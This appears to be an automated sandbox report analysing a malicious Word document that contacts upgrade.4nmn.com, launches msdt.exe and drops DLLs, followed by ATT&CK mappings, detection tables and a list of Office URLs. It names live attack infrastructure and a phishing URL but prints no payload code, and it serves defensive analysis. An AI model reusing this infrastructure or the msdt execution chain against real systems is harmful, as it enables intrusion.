            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts521
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		11
            Masquerading            		OS Credential Dumping1
            Query Registry            		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		251
            Virtualization/Sandbox Evasion            		LSASS Memory431
            Security Software Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts13
            Exploitation for Client Execution            		Logon Script (Windows)1
            Extra Window Memory Injection            		11
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            PowerShell            		Logon Script (Mac)Logon Script (Mac)1
            DLL Side-Loading            		NTDS251
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Extra Window Memory Injection            		Cached Domain Credentials1
            Remote System Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
            File and Directory Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow124
            System Information Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 648583 Sample: WF0SlQWKr1.docx Startdate: 20/06/2022 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 5 other signatures 2->58 6 powershell.exe 52 2->6         started        9 WINWORD.EXE 313 58 2->9         started        13 csc.exe 3 2->13         started        15 2 other processes 2->15 process3 dnsIp4 60 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 6->60 62 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 6->62 64 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 6->64 66 3 other signatures 6->66 17 conhost.exe 6->17         started        19 ipconfig.exe 1 6->19         started        50 upgrade.4nmn.com 116.203.251.9, 443, 49734, 49735 HETZNER-ASDE Germany 9->50 36 C:\Users\user\AppData\...\WF0SlQWKr1.docx.LNK, MS 9->36 dropped 38 C:\Users\user\AppData\...\microsoft[1].htm, HTML 9->38 dropped 40 C:\Users\user\AppData\Local\...\7BB121F.htm, HTML 9->40 dropped 42 C:\Users\user\AppData\Local\...\14E38085.htm, HTML 9->42 dropped 21 msdt.exe 21 9->21         started        24 MSOSYNC.EXE 5 12 9->24         started        44 C:\Users\user\AppData\Local\...\05d3mwhu.dll, PE32 13->44 dropped 26 cvtres.exe 1 13->26         started        46 C:\Users\user\AppData\Local\...\qghxibcc.dll, PE32 15->46 dropped 48 C:\Users\user\AppData\Local\...\53i2jeo5.dll, PE32 15->48 dropped 28 cvtres.exe 1 15->28         started        30 cvtres.exe 1 15->30         started        file5 signatures6 process7 file8 32 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 21->32 dropped 34 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 21->34 dropped

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            WF0SlQWKr1.docx20%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll0%MetadefenderBrowse
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll0%ReversingLabs
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            upgrade.4nmn.com5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://roaming.edog.0%URL Reputationsafe
            https://cdn.entity.0%URL Reputationsafe
            https://powerlift.acompli.net0%URL Reputationsafe
            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
            https://cortana.ai0%URL Reputationsafe
            https://api.aadrm.com/0%URL Reputationsafe
            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
            https://upgrade.4nmn.com/microsoft.html6%VirustotalBrowse
            https://upgrade.4nmn.com/microsoft.html100%Avira URL Cloudphishing
            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
            https://store.office.cn/addinstemplate0%URL Reputationsafe
            https://api.aadrm.com0%URL Reputationsafe
            https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
            https://www.odwebp.svc.ms0%URL Reputationsafe
            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
            https://dataservice.o365filtering.com/0%URL Reputationsafe
            https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
            https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
            https://ncus.contentsync.0%URL Reputationsafe
            https://apis.live.net/v5.0/0%URL Reputationsafe
            https://wus2.contentsync.0%URL Reputationsafe
            https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
            https://ncus.pagecontentsync.0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            upgrade.4nmn.com
            		116.203.251.9
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://upgrade.4nmn.com/microsoft.htmltrue
            • 6%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://api.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
              		high
              https://login.microsoftonline.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                		high
                https://shell.suite.office.com:14431A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                  		high
                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                    		high
                    https://autodiscover-s.outlook.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                      		high
                      https://roaming.edog.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                        		high
                        https://cdn.entity.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.addins.omex.office.net/appinfo/query1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                          		high
                          https://clients.config.office.net/user/v1.0/tenantassociationkey1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                            		high
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              		high
                              https://powerlift.acompli.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://rpsticket.partnerservices.getmicrosoftkey.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v11A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                		high
                                https://cortana.ai1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                  		high
                                  https://cloudfiles.onenote.com/upload.aspx1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                    		high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                      		high
                                      https://entitlement.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                        		high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          		high
                                          https://api.aadrm.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ofcrecsvcapi-int.azurewebsites.net/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                            		high
                                            https://api.microsoftstream.com/api/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                              		high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                		high
                                                https://cr.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                  		high
                                                  https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://portal.office.com/account/?ref=ClientMeControl1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                    		high
                                                    https://graph.ppe.windows.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      		high
                                                      https://res.getmicrosoftkey.com/api/redemptionevents1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://powerlift-frontdesk.acompli.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://tasks.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                        		high
                                                        https://officeci.azurewebsites.net/api/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/work1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          		high
                                                          https://store.office.cn/addinstemplate1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.aadrm.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                            		high
                                                            https://globaldisco.crm.dynamics.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                              		high
                                                              https://messaging.engagement.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                		high
                                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  		high
                                                                  https://dev0-api.acompli.net/autodetect1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.odwebp.svc.ms1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://api.diagnosticssdf.office.com/v2/feedback1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                    		high
                                                                    https://api.powerbi.com/v1.0/myorg/groups1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                        		high
                                                                        https://api.addins.store.officeppe.com/addinstemplate1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://graph.windows.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          		high
                                                                          https://dataservice.o365filtering.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://officesetup.getmicrosoftkey.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://analysis.windows.net/powerbi/api1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                            		high
                                                                            https://prod-global-autodetect.acompli.net/autodetect1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                              		high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                		high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                  		high
                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                    		high
                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                      		high
                                                                                      https://ncus.contentsync.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                        		high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                          		high
                                                                                          http://weather.service.msn.com/data.aspx1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                            		high
                                                                                            https://apis.live.net/v5.0/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                              		high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                		high
                                                                                                https://messaging.lifecycle.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                  		high
                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                    		high
                                                                                                    https://management.azure.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                      		high
                                                                                                      https://outlook.office365.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                        		high
                                                                                                        https://wus2.contentsync.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://incidents.diagnostics.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                          		high
                                                                                                          https://clients.config.office.net/user/v1.0/ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                            		high
                                                                                                            https://insertmedia.bing.office.net/odc/insertmedia1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                              		high
                                                                                                              https://o365auditrealtimeingestion.manage.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                		high
                                                                                                                https://outlook.office365.com/api/v1.0/me/Activities1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                  		high
                                                                                                                  https://api.office.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                    		high
                                                                                                                    https://incidents.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                      		high
                                                                                                                      https://asgsmsproxyapi.azurewebsites.net/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://clients.config.office.net/user/v1.0/android/policies1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                        		high
                                                                                                                        https://entitlement.diagnostics.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                          		high
                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                            		high
                                                                                                                            https://substrate.office.com/search/api/v2/init1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                              		high
